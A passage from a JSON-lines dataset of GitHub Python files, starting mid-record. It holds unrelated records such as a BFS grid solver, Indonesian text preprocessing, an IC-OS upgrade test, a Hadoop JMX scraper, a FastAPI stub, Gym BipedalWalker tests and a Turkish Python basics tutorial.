uselist=False)\n","repo_name":"BesedinGeny/mathsite_backend","sub_path":"app/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8914341165","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nN, M, K = map(int, input().split())\r\narr=[[0]*(M) for _ in range(N)]\r\nfor _ in range(K):\r\n a, b = map(int, input().split())\r\n arr[a-1][b-1]=1\r\n \r\ndx = [1,0,-1,0]\r\ndy = [0,1,0,-1]\r\n\r\nfrom collections import deque\r\nq = deque()\r\nresult = 0\r\nfor j in range(M):\r\n for i in range(N):\r\n if arr[i][j]==1:\r\n q.append((i,j))\r\n arr[i][j]=0\r\n ans = 1\r\n while q:\r\n x, y = q.popleft()\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n if -1 < nx and nx < N and -1 < ny and ny < M and arr[nx][ny]==1:\r\n q.append((nx,ny))\r\n arr[nx][ny]=0\r\n ans += 1\r\n result = max(result, ans)\r\n \r\nprint(result)","repo_name":"qorjiwon/Algorithm","sub_path":"백준/Silver/1743. 음식물 피하기/음식물 피하기.py","file_name":"음식물 피하기.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18284273019","text":"import re, unicodedata\nfrom nlp_id.lemmatizer import Lemmatizer\nfrom nlp_id.stopword import StopWord \nfrom Sastrawi.Stemmer.StemmerFactory import StemmerFactory\nfrom nltk.tokenize import word_tokenize\n\nunwanted_words = [ \n 'jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', \n 'sep', 'oct', 'nov', 'dec', 'uaddown', 'weareuad', 'lam', 'https', 'igshid', 'balas', 'replying', 'to'\n]\n\ndef hitung_kemunculan(kalimat, array_kata):\n result = {}\n print(kalimat)\n # print(kalimat.find(\"internet\"))\n \n for i, kata in enumerate(array_kata):\n jumlah_kemunculan = 0\n for index, kataDataFrame in enumerate(kalimat):\n jumlah_kemunculan += kataDataFrame.count(kata)\n result[f'{kata}'] = jumlah_kemunculan\n return result\n\ndef Case_Folding(text):\n try:\n # Mengubah text menjadi lowercase\n text = text.lower()\n # Menghapus white space\n text = re.sub('[\\s]+', ' ', text)\n \n return text\n except AttributeError as error:\n raise AttributeError(str(error))\n\ndef Cleansing(text):\n try:\n text = text.lstrip()\n # Hapus tag atau tagar menggunakan metode sub() dari modul re\n text_cleanedat = re.sub(r'@\\w+\\s', '', text)\n text_cleaned = re.sub(r'#\\w+\\s', '', text_cleanedat)\n \n # Definisikan pola regex untuk mendeteksi link\n pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\\\(\\\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\n\n # Definisikan pola regex untuk mendeteksi domain\n patternDomain = r'\\b[A-Za-z0-9-]+(?:\\.[A-Za-z0-9-]+)*\\.[A-Za-z]{2,}\\b'\n \n # Hapus domain menggunakan metode sub() dari modul re\n text = re.sub(patternDomain, \"\", text_cleaned)\n\n # Hapus link menggunakan metode sub() dari modul re\n text = re.sub(pattern, \"\", text) \n \n # hapus non-ascii \n text = unicodedata.normalize(\"NFKD\", text).encode(\"ascii\", \"ignore\").decode(\"utf-8\", \"ignore\")\n \n # Menghapus tanda baca \n text = re.sub(r'[^\\w]|_', ' ', text)\n \n # Menghapus angka\n text = re.sub(\"\\S*\\d\\S*\", \"\", text).strip()\n text = re.sub(\"\\b\\d+\\b\", \" \", text)\n return text.strip()\n except TypeError as error:\n raise TypeError(str(error))\n \n\ndef lemmatisasi():\n \"\"\"\n mengembalikan kata kepada kata dasarnya yang disesuaikan dengan kamus Bahasa Indonesia\n \"\"\"\n lemmatizer = Lemmatizer()\n return lemmatizer\n\ndef stemming():\n # membuat stemmer\n factory = StemmerFactory()\n stemmer = factory.create_stemmer()\n return stemmer\n\ndef Slangwords(text, slang_dict):\n words = text.split()\n normalized_words = [slang_dict[word] if word in slang_dict else word for word in words]\n normalized_text = ' '.join(normalized_words)\n return normalized_text\n\ndef stopwordRemoval():\n stopword = StopWord() \n return stopword\n\ndef RemoveUnwantedWords(text):\n word_tokens = word_tokenize(text)\n fillterd_sentence = [word for word in word_tokens if not word in unwanted_words]\n return ' '.join(fillterd_sentence)\n\n# Menghitung kata-kata positif / negatif pada teks dan menentukan sentimennya\ndef lexicon_indonesia(text, list_positive, list_negative):\n positive_words = []\n negative_words = []\n neutral_words = []\n score = 0\n for word in text:\n if (word in list_positive):\n score += 1\n positive_words.append(word)\n if (word in list_negative):\n score -= 1\n negative_words.append(word)\n if (word not in list_positive and word not in list_negative): \n neutral_words.append(word)\n\n polarity=''\n if (score > 0):\n polarity = 'positive'\n elif (score < 0):\n polarity = 'negative'\n else:\n polarity = 'neutral'\n \n return score, polarity, positive_words, negative_words\n","repo_name":"hafisKuhfi14/testDeta","sub_path":"app/modules/txt_preprocessing.py","file_name":"txt_preprocessing.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71859688168","text":"#!/usr/bin/env python3\nimport atexit\nimport os\nimport subprocess\nimport sys\nimport tempfile\n\nimport gflags\nimport ictools\nimport vmtools\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_string(\"upgrade_tar\", None, \"Path to upgrade tar file\")\ngflags.MarkFlagAsRequired(\"upgrade_tar\")\ngflags.DEFINE_string(\"script_dir\", None, \"Path to folder with scripts\")\ngflags.MarkFlagAsRequired(\"script_dir\")\ngflags.DEFINE_string(\"disk_image\", None, \"Path to disk image to use for VMs\")\ngflags.MarkFlagAsRequired(\"disk_image\")\ngflags.DEFINE_string(\"version\", None, \"Version of the disk image\")\ngflags.MarkFlagAsRequired(\"version\")\n\n\ndef create_upgrade_image(version):\n upgrade_image = tempfile.mktemp(suffix=\".tar.gz\")\n atexit.register(lambda: os.remove(upgrade_image))\n\n subprocess.run(\n [\n \"%s/ci-change-upgrade-version.sh\" % FLAGS.script_dir,\n \"--upgrade-image=%s\" % FLAGS.upgrade_tar,\n \"--out=%s\" % upgrade_image,\n \"--version=%s\" % version,\n ],\n check=True,\n )\n\n return upgrade_image\n\n\ndef upgrade(ic_url, origin_ip):\n\n for iteration in range(75):\n upgrade_image = create_upgrade_image(iteration)\n\n run = True\n while run:\n r = subprocess.run(\n [\n \"%s/ci-bless-version.sh\" % FLAGS.script_dir,\n \"--origin-ip=%s\" % origin_ip,\n \"--upgrade-image=%s\" % upgrade_image,\n \"--nns-url=%s\" % ic_url,\n \"--ic-admin-bin=%s\" % FLAGS.ic_admin_bin,\n ],\n )\n run = r.returncode != 0\n\n run = True\n while run:\n r = subprocess.run(\n [\n \"%s/ci-upgrade.sh\" % FLAGS.script_dir,\n \"--origin-ip=%s\" % origin_ip,\n \"--upgrade-image=%s\" % upgrade_image,\n \"--nns-url=%s\" % ic_url,\n \"--ic-admin-bin=%s\" % FLAGS.ic_admin_bin,\n ],\n )\n run = r.returncode != 0\n\n\ndef main(argv):\n argv = FLAGS(argv)\n\n machines = vmtools.pool().request_machines(\n [\n {\"name\": \"node0\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node1\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node2\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node3\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n {\"name\": \"node4\", \"ram\": \"6G\", \"disk\": \"100G\", \"cores\": 1},\n ],\n )\n\n system_image = vmtools.SystemImage.open_local(FLAGS.disk_image)\n\n ic_config = ictools.ic_prep(\n subnets=[[machines[i].get_ipv6() for i in range(len(machines))]],\n version=FLAGS.version,\n root_subnet=0,\n )\n\n machine_config_images = [\n ictools.build_ic_prep_inject_config(machines[n], ic_config, n, ictools.build_ssh_extra_config())\n for n in range(len(machines))\n ]\n\n vmtools.start_machines(\n [(machine, system_image, config_image) for machine, config_image in zip(machines, machine_config_images)],\n start_ssh_log_streaming=True,\n )\n\n ic_url = \"http://[%s]:8080\" % machines[0].get_ipv6()\n\n ictools.wait_http_up(ic_url)\n\n ictools.nns_install(ic_config, ic_url)\n upgrade(ic_url, machines[0].get_ipv6())\n\n for i in range(len(machines)):\n machines[i].stop()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"simond110/ic","sub_path":"ic-os/guestos/tests/e2e-continuous-upgrade-testing.py","file_name":"e2e-continuous-upgrade-testing.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34375688926","text":"# a program that will print the earning value based on user's picking things.\r\n\r\nimport random\r\n\r\nArk1 = [\"room1\", \"room2\"]\r\nArk2 = [\"room1\", \"room2\"]\r\nArk1_room1 = [\"apple\", \"banana\", \"mango\", \"orange\", \"pineapple\", \"jackfruit\", \"coconut\", \"olive\"]\r\nArk1_room2 = [\"mobile\", \"computer\", \"pc\", \"smartwatch\", \"watch\", \"clock\", \"tab\", \"tv\"]\r\nArk2_room1 = [\"richman\", \"polo\", \"zara\", \"louisVuitton\", \"gucci\", \"nike\", \"armani\", \"D&G\"]\r\nArk2_room2 = [\"nike\", \"adidas\", \"allStar\", \"northStar\", \"vans\", \"puma\", \"reebok\", \"newBalance\"]\r\n\r\nthings_info = {\"apple\":20, \"banana\":10, \"mango\":25, \"orange\":30, \"pineapple\":40, \"jackfruit\":100, \"coconut\":50, \"olive\":80, \"mobile\":130000, \"computer\":99000, \"pc\":157000, \"smartwatch\":20000, \"watch\":200000, \"clock\":125000, \"tab\":40000, \"tv\":50000,\r\n\"richman\":12000, \"polo\":11000, \"zara\":10000, \"louisVuitton\":9000, \"gucci\":8000, \"nike\":7000, \"armani\":6000, \"D&G\":5000, \"nike\":12000, \"adidas\":12000, \"allStar\":11000, \"northStar\":11000, \"vans\":10000, \"puma\":9000, \"reebok\":8000, \"newBalance\":10000}\r\n\r\nli_ark1_room1 = [\"dummy\", \"dummy\", \"dummy\"]\r\nli_ark1_room2 = [\"dummy\", \"dummy\", \"dummy\"]\r\nli_ark2_room1 = [\"dummy\", \"dummy\", \"dummy\"]\r\nli_ark2_room2 = [\"dummy\", \"dummy\", \"dummy\"]\r\n\r\ndef showList(flat):\r\n\tif flat == 1:\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark1_room1[i] = Ark1_room1[rand_i]\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark1_room2[i] = Ark1_room2[rand_i]\r\n\telse:\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark2_room1[i] = Ark2_room1[rand_i]\r\n\t\tfor i in range(3):\r\n\t\t\trand_i = random.randint(0, 7)\r\n\t\t\tli_ark2_room2[i] = Ark2_room2[rand_i]\r\n\r\ndef showEarnVal(thing1, thing2):\r\n\tearn_val1 = things_info[thing1]\r\n\tearn_val2 = things_info[thing2]\r\n\ttotal_earn_val = earn_val1 + earn_val2\r\n\r\n\tprint(\"You have picked two things from two room. Here is the earning value of your: $\", total_earn_val)\r\n\t\r\n\tif total_earn_val in range(1, 20000):\r\n\t\tprint(\"Poor earning! May be not your day. Pick things wisely. Better luck next time.\")\r\n\telif total_earn_val in range(20000, 50000):\r\n\t\tprint(\"Good! Try to earn more.\")\r\n\telse:\r\n\t\tprint(\"Awesome! You have earned big bucks. Keep it up. See you again.\")\r\n\t\r\n\r\nprint(\"Welcome to Pick N Earn! It's time to pick and earn :)\")\r\nprint(\"There are two flats. 'The Ark-1' and 'The Ark-2'\")\r\n\r\nprogram_status = True\r\nsub_program_status = True\r\n\r\nwhile program_status:\r\n\tflat = int(input(\"Enter a choice. For 'The Ark-1' type 1 and for 'The Ark-2' type 2. \"))\r\n\t\r\n\tif flat == 1:\r\n\t\tprint(\"You have entered\", Ark1[0], \"! Pick only a one thing from the following list:\")\r\n\t\tshowList(flat)\r\n\r\n\t\twhile sub_program_status:\r\n\t\t\tprint(\"Wow! Fruits found! Good for health.\", li_ark1_room1)\r\n\t\t\tthing1 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\tthing1 = thing1.lower()\r\n\t\t\t\r\n\t\t\tif thing1 not in li_ark1_room1:\r\n\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\tcontinue\r\n\t\t\telse:\r\n\t\t\t\tprint(\"You have entered\", Ark1[1], \"! Pick only a one thing from the following list:\")\r\n\t\t\t\t\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tprint(\"Wow! Gadgets found!\", li_ark1_room2)\r\n\t\t\t\t\tthing2 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\t\t\tthing2 = thing2.lower()\r\n\t\t\t\t\t\r\n\t\t\t\t\tif thing2 not in li_ark1_room2:\r\n\t\t\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tshowEarnVal(thing1, thing2)\r\n\t\t\t\t\t\tsub_program_status = False\r\n\t\t\t\t\t\tprogram_status = False\r\n\t\t\t\t\t\tbreak\r\n\telif flat == 2:\r\n\t\tprint(\"You have entered\", Ark2[0], \"! Pick only a one thing from the following list:\")\r\n\t\tshowList(flat)\r\n\t\t\r\n\t\twhile sub_program_status:\r\n\t\t\tprint(\"Wow! T-shirts found!\", li_ark2_room1)\r\n\t\t\tthing1 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\t\r\n\t\t\tif thing1 not in li_ark2_room1:\r\n\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\tcontinue\r\n\t\t\telse:\r\n\t\t\t\tprint(\"You have entered\", Ark2[1], \"! Pick only a one thing from the following list:\")\r\n\t\t\t\t\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tprint(\"Wow! shoes found!\", li_ark2_room2)\r\n\t\t\t\t\tthing2 = input(\"Type the name of thing that you wanna pick (pick wisely): \")\r\n\t\t\t\t\t\r\n\t\t\t\t\tif thing2 not in li_ark2_room2:\r\n\t\t\t\t\t\tprint(\"Only allow one thing from the above list!\")\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tshowEarnVal(thing1, thing2)\r\n\t\t\t\t\t\tsub_program_status = False\r\n\t\t\t\t\t\tprogram_status = False\r\n\t\t\t\t\t\tbreak\r\n\telse:\r\n\t\tprint(\"Please type a valid choice! Type 1 or 2.\")\r\n\t\tcontinue","repo_name":"rashedrahat/wee-py-proj","sub_path":"pickNearn.py","file_name":"pickNearn.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9760819719","text":"from player import Player\r\n\r\ndef updatePlayers(players):\r\n colors = ['cornflowerblue', 'coral', 'crimson', 'goldenrod', 'darkblue', 'green',\r\n 'blue', 'darkred', 'salmon', 'sienna', 'slateblue', 'violet', 'purple', 'gray']\r\n\r\n for i, p in enumerate(players):\r\n players[i].checkByes()\r\n players[i].setAverages()\r\n players[i].setDiffs()\r\n players[i].setColor(colors[i])\r\n #players[i].printPlayer()\r\n\r\n return players\r\n","repo_name":"amjohnson36/FantasyGraphs","sub_path":"updatePlayers.py","file_name":"updatePlayers.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23194580125","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom enum import Enum\nfrom pydantic import BaseModel\n\n\nclass Category(str, Enum):\n atheism = \"atheism\"\n climate_change = \"climate_change\"\n hillary_clinton = \"hillary_clinton\"\n legalize_abortion = \"legalize_abortion\"\n feminist_movement = \"feminist_movement\"\n\n\nclass Target(BaseModel):\n model: str = 'Multiclass'\n description: str = None\n category: Category\n tweet: str\n\n\napp = FastAPI(debug=True) # decorator\n\n\"\"\"\nPATH/ROUTE OPERATION FUNCTIONS.\npost: create data\nput: update data\nget: get data\ndelete: del data\n\ncoroutines: coroutines are functions whose execution you can pause (like generators)\nevent loop: when A happens, do B (asyncio)\nasync fn: define a funcion as being a coroutine --> async def name(): await stufff() like yield from stuff()\n\"\"\"\n\n\n@app.get(\"/\")\nasync def root():\n return {'message': 'Hello there! This is an API that is able to classify tweets stances for 5 controversial '\n 'topics. That for now... but the idea is to build a tool to arbitrary classify text for over '\n '100 different categories and able to extract best candidates insides a corpus... you will '\n 'see. For now, move to \"home\".'}\n\n\n@app.get(\"/home\")\nasync def home_page():\n return {'message': 'Home sweet home. Here you will decide what NLP task you want to solve and in which language.'}\n\n\n@app.get(\"/home/multiclass/{category}\")\nasync def get_model(category: Category, tweet: str = 'pio! pio!'):\n response = {'category':category, 'message': 'all rigth!'}\n if tweet:\n response.update({'tweet': tweet})\n if category == Category.atheism:\n return {'category': category, 'message': 'fast-bert for multiclass in a religious topic, all right!',\n 'tweet': tweet}\n if category.value == 'climate_change':\n return {'category': category, 'message': 'fast-bert for multiclass in somthing of this nature?, of course!',\n 'tweet': tweet}\n if category == Category.hillary_clinton:\n return {'category': category, 'message': 'fast-bert for multiclass about a specific politic figure, lets find '\n 'out!', 'tweet': tweet}\n if category == Category.legalize_abortion:\n return {'category': category, 'message': 'fast-bert for multiclass in... oh... sad... legalization of '\n 'abortion. Lets see.', 'tweet': tweet}\n return {'category': category, 'message': 'fast-bert for multiclass in this fast-growing movement, all right!',\n 'tweet': tweet}\n\n\n@app.post(\"/home/multiclass/\")\nasync def get_response(query: Target):\n response = query.dict()\n # here I should run the model depending on the query params\n response.update({'prediction': 'Not implemented :S'})\n return response\n\nif __name__ == '__main__':\n uvicorn.run(app, host='127.0.0.1', port=8000)\n","repo_name":"LaverdeS/Introduction_NLP","sub_path":"src/restapi/source/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27534685369","text":"#!/usr/bin/env python2\r\n# -*- coding: utf-8 -*-\r\n\r\nimport threading\r\nimport requests\r\n\r\nfrom utils import get_module_logger\r\n\r\n\r\nlogger = get_module_logger(__name__)\r\n\r\n\r\nclass Scraper(threading.Thread):\r\n def __init__(self, url, result):\r\n super(Scraper, self).__init__()\r\n self.name = \"thread-%s\" % url\r\n self.url = url\r\n self.result = result\r\n\r\n def run(self):\r\n result = []\r\n try:\r\n s = requests.session()\r\n response = s.get(self.url, timeout=5)\r\n except Exception as e:\r\n logger.warning(\"Get {0} failed, error: {1}.\".format(self.url, str(e)))\r\n else:\r\n if response.status_code != requests.codes.ok:\r\n logger.warning(\"Get {0} failed, response code is: {1}.\".format(self.url, response.status_code))\r\n else:\r\n rlt = response.json()\r\n if rlt and \"beans\" in rlt:\r\n result = rlt['beans']\r\n else:\r\n logger.warning(\"No metrics get in the {0}.\".format(self.url))\r\n s.close()\r\n if len(result) > 0:\r\n self.result.append(result)\r\n\r\n\r\nclass ScrapeMetrics(object):\r\n def __init__(self, urls):\r\n self.urls = urls\r\n\r\n def scrape(self):\r\n result = []\r\n tasks = [Scraper(url, result) for url in self.urls]\r\n for task in tasks:\r\n task.start()\r\n for task in tasks:\r\n task.join()\r\n return result\r\n","repo_name":"opsnull/hadoop_jmx_exporter","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"} +{"seq_id":"17609919500","text":"from django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n path('', index, name='index'),\n path('disk/<int:pk>', disk, name='disk'),\n path('disk/create/', disk_create, name='disk_create'),\n path('disk/edit/<int:pk>', disk_edit, name='disk_edit'),\n path('disk/delete/<int:pk>', disk_delete, name='disk_delete'),\n]","repo_name":"vitorqf/django-disk-model","sub_path":"app/core/sebo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5685682159","text":"import gym\r\nimport numpy as np\r\nimport time\r\nfrom collections import deque\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef make_normal_env():\r\n env = gym.make('BipedalWalker-v3')\r\n env.seed(10)\r\n print('observation space:', env.observation_space)\r\n print('action space:', env.action_space)\r\n return env\r\n\r\n\r\ndef make_hardcore():\r\n env = gym.make('BipedalWalkerHardcore-v3')\r\n env.seed(10)\r\n return env\r\n\r\n\r\n# 观察一个未经训练的随机智能体\r\ndef random_without_break(env):\r\n for _ in range(3000):\r\n env.reset()\r\n env.render()\r\n for t in range(1000):\r\n action = np.random.uniform(low=-1.0, high=1.0, size=4)\r\n next_state, reward, done, _ = env.step(action)\r\n env.close()\r\n\r\n\r\ndef random_with_break(env):\r\n env.reset()\r\n for _ in range(1000):\r\n env.render()\r\n action = np.random.uniform(low=-1.0, high=1.0, size=4)\r\n next_state, reward, done, _ = env.step(action)\r\n if done:\r\n break\r\n env.close()\r\n\r\n\r\nnormal_env=make_normal_env()\r\nhardcore_env=make_hardcore()\r\nrandom_with_break(hardcore_env)\r\n\r\n\r\n","repo_name":"Quantum-Cheese/reinforcement_learning_projects","sub_path":"BipedalWalker/envTest.py","file_name":"envTest.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"70758829289","text":"import json\nimport numpy as np\nfrom typing import Optional\nfrom facekeeper.core import FaceKeeper\nfrom facekeeper.consumer import Consumer\nfrom unittest.mock import MagicMock, create_autospec, Mock\nfrom pika.adapters.blocking_connection import BlockingChannel\n\n\ndef callback_input_output_helper(\n callback_input, callback_output: Optional[object], expected_body: str\n):\n assert isinstance(expected_body, str)\n \"\"\"\n Ensure when callback returns non empty Object callback_output then\n Consumer will publish to the output queue the callback_input\n dictionary merged with callback_output\n \"\"\"\n # Given\n queue_in = \"queue.in\"\n queue_out = \"queue.out\"\n\n # Setup mocks\n callback = MagicMock(return_value=callback_output)\n channel = create_autospec(BlockingChannel)\n channel.basic_publish = MagicMock()\n consumer = Consumer(\n create_autospec(FaceKeeper), channel, queue_in, queue_out, callback\n )\n\n # When\n method = Mock(delivery_tag=\"some-delivery-tag\")\n consumer.on_message(channel, method, None, json.dumps(callback_input))\n\n # Then\n channel.basic_publish.assert_called_once_with(\"\", queue_out, body=expected_body, mandatory=True)\n\n\ndef test_callback_success():\n input = {\"url\": \"https://example.com/john.jpg\"}\n person = \"john\"\n tags = []\n output = {\n \"embedding_id\": \"embedding_id\",\n \"digest\": \"digest\",\n \"recognizer\": \"recognizer\",\n \"embedding\": np.array([1, 2, 3]).tolist(),\n \"person\": person,\n \"tags\": tags,\n \"success\": True\n }\n body = json.dumps({**input, **output})\n callback_input_output_helper(input, output, body)\n\n\ndef test_callback_empty_result():\n \"\"\"\n Ensure when person is not found on the picture\n the app will push proper message to the queue\n \"\"\"\n # When the person is not found the FaceKeeper Core returns None\n input = {\"url\": \"https://google.com\"}\n output = {\"success\": False}\n body = json.dumps({\"url\": \"https://google.com\", \"success\": False})\n callback_input_output_helper(input, output, body)\n","repo_name":"dairlair/facekeeper","sub_path":"facekeeper/tests/test_consumer.py","file_name":"test_consumer.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20912273835","text":"\r\n# %% veriable (degisken)\r\n\r\nvar1 = 10 # integer = int\r\nvar2 = 15\r\n\r\ngun=\"pazartesi\" # string\r\n\r\nvar3 = 10.0 # double(float)\r\n\r\n# 5var = 10 # hata verir\r\n\r\nVar7 = 19 # standart convention of python'a gore buyuk harfle baslamasi uygun degil\r\n\r\n# %% string \r\n\r\ns = \"bugun gunlerden pazartesi\"\r\nvariable_type = type(s) # str = string\r\nprint(s) # s 'e atadığımız veriler okunur\r\n\r\nvar1 = \"ankara\"\r\nvar2 = \"ist\"\r\nvar3 = var1+var2 # ankaraist çıktısını alırız\r\n\r\nvar4 = \"100\"\r\nvar5 = \"200\"\r\nvar6 = var4+var5 #100200 çıktısını alırız, çünkü string değerlerdir.\r\n\r\nuzunluk = len(var6) #Çıktı olarak 6 değerini alırız\r\n\r\n# %% numbers\r\n\r\ninteger_deneme = -50 # int\r\n\r\nfloat_deneme = -30.7 # double = float = ondalikli sayi\r\n\r\n# %% tür dönüşümleri\r\n\r\nfloat1 = 10.6 \r\n# int(float1) = float bir sayısı int değerine çeviriyor.\r\n# round(float1) = onluk bir sayıyı int değere çevirme\r\n\r\nstr2 = \"1005\"\r\nint(str2) # string değeri integer a çevirir.\r\n\r\n# %% user defined functions\r\nvar1 = 20\r\nvar2 = 50\r\noutput = (((var1+var2)*50)/100.0)*var1/var2\r\n\r\n# fonksiyon parametresi = input\r\ndef benim_ilk_func(a,b):\r\n \r\n \"\"\"\r\n bu benim ilk denemem\r\n parametre: \r\n return: \r\n \"\"\"\r\n output = (((a+b)*50)/100.0)*a/b\r\n return output\r\n \r\nsonuc = benim_ilk_func(var1,var2)\r\nprint(sonuc)\r\n\r\n# %% default ve flexible functionları\r\n\r\n# default = Cemberin cevresini hesapla\r\ndef cember_cevresi_hesapla(r,pi=3.14): # input = r, output = cemberin cevresi\r\n output = 2*pi*r\r\n return output\r\n\r\n# flexible\r\ndef hesapla(boy,kilo,*args):\r\n print(args) # istediğiniz parametreyi girebilirsin\r\n output = (boy+kilo)*args[0]\r\n return output\r\n\r\n# %% lambda function\r\ndef hesapla(x):\r\n return x*x\r\nsonuc1 = hesapla(3)\r\n# sonuc1 ve sonuc2 de aynı işlevleri gerçekleştiriyoruz.\r\nsonuc2 = lambda x: x*x\r\nprint(sonuc2(3))\r\n\r\n# %% list\r\n\r\nliste = [1,2,3,4,5,6]\r\ntype(liste) # integer liste oluşumu\r\n\r\nliste_str = [\"ptesi\",\"sali\",\"cars\"]\r\ntype(liste_str) # string liste oluşumu\r\n\r\nvalue = liste[1]\r\nprint(value) # listenin 1. indexini yazdır\r\n\r\nlast_value = liste[-1] # listenin en sonundan başlayarak -1. değerini yazdır\r\n\r\nliste_divide = liste[0:3] # listenin 0 dan 3 e kadar olan değerlerini yazdır\r\n\r\nliste.append(7) # listenin sonuna 7 ekle\r\nliste.remove(7) # listeden 7 yi çıkar\r\nliste.reverse() # listeyi terseten yazdır\r\n\r\nliste2 = [1,5,4,3,6,7,2]\r\nliste2.sort() # listeyi küçükten büyüğe yazdırır\r\n\r\nstring_int_liste = [1,2,3,\"aa\",\"bb\"] # Karışık değişkenli liste oluşturma\r\n\r\n# %% tuple\r\n\r\nt = (1,2,3,3,4,5,6)\r\n\r\nt.count(3) # t'nin içinde kaç tane 3 var\r\nt.index(3) # 3'ün index sayısını bul\r\n\r\n# %% dictionary\r\n\r\ndef deneme():\r\n dictionary = {\"ali\":32,\"veli\":45,\"ayse\":13}\r\n return dictionary\r\n\r\ndic = deneme()\r\n\r\n# %% conditionals\r\n# if else statement\r\n\r\nvar1 = 10\r\nvar2 = 20\r\n\r\nif(var1 > var2):\r\n print(\"var1 buyuktur var2\")\r\nelif(var1 == var2):\r\n print(\"var and var2 esitler\")\r\nelse:\r\n print(\"var1 kucuktur var2\")\r\n\r\n# format ile yazdırma\r\nliste = [1,2,3,4,5]\r\nvalue = 3\r\nif value in liste:\r\n print(\"evet {} degeri listenin icinde\".format(value))\r\nelse:\r\n print(\"hayir\")\r\n\r\n\r\n# %% loops (donguler)\r\n\r\n# for loop\r\n\r\nfor each in range(1,11):\r\n print(each) # 1'den 10'a kadar yazdır\r\n \r\nfor each in \"ankara ist\":\r\n print(each) # tüm harfleri tek tek yazdır\r\n \r\nfor each in \"ankara ist\".split(): \r\n print(each) # split kelimeleri boşluklarına göre ayır\r\n \r\nliste = [1,4,5,6,8,3,3,4,67]\r\nsummation = sum(liste) # listenin içindeki değerleri topla \r\n\r\ncount = 0\r\nfor each in liste:\r\n count = count + each\r\n print(count) # for ile listenin içindeki değerleri topla\r\n \r\n# ------------------------------------------------------------------------------------------------- \r\n# while loop\r\n \r\ni = 0\r\nwhile(i <4):\r\n print(i)\r\n i = i + 1 # 0,1,2,3 değerilerini yazdırır\r\n\r\nsinir = len(liste) \r\neach = 0\r\ncount = 0\r\nwhile(each < sinir):\r\n count = count + liste[each]\r\n each = each + 1 \r\n\r\n \r\n# %% class\r\n \r\nclass Calisan:\r\n zam_orani = 1.8\r\n counter = 0\r\n def __init__(self,isim,soyisim,maas): # constructor\r\n self.isim = isim\r\n self.soyisim = soyisim\r\n self.maas = maas\r\n self.email = isim+soyisim+\"@asd.com\"\r\n \r\n Calisan.counter = Calisan.counter + 1\r\n \r\n def giveNameSurname(self):\r\n return self.isim +\" \" +self.soyisim # isim ve soyismi aynı anda veren metod\r\n \r\n def zam_yap(self):\r\n self.maas = self.maas + self.maas*self.zam_orani\r\n \r\n# class variable\r\ncalisan1 = Calisan(\"ali\", \"veli\",100) \r\nprint(\"ilk maas: \",calisan1.maas)\r\ncalisan1.zam_yap()\r\nprint(\"yeni maas: \",calisan1.maas)\r\n\r\ncalisan2 = Calisan(\"ayse\", \"hatice\",200) \r\ncalisan3 = Calisan(\"ayse\", \"yelda\",600) \r\ncalisan4 = Calisan(\"eren\", \"hilal\",500) 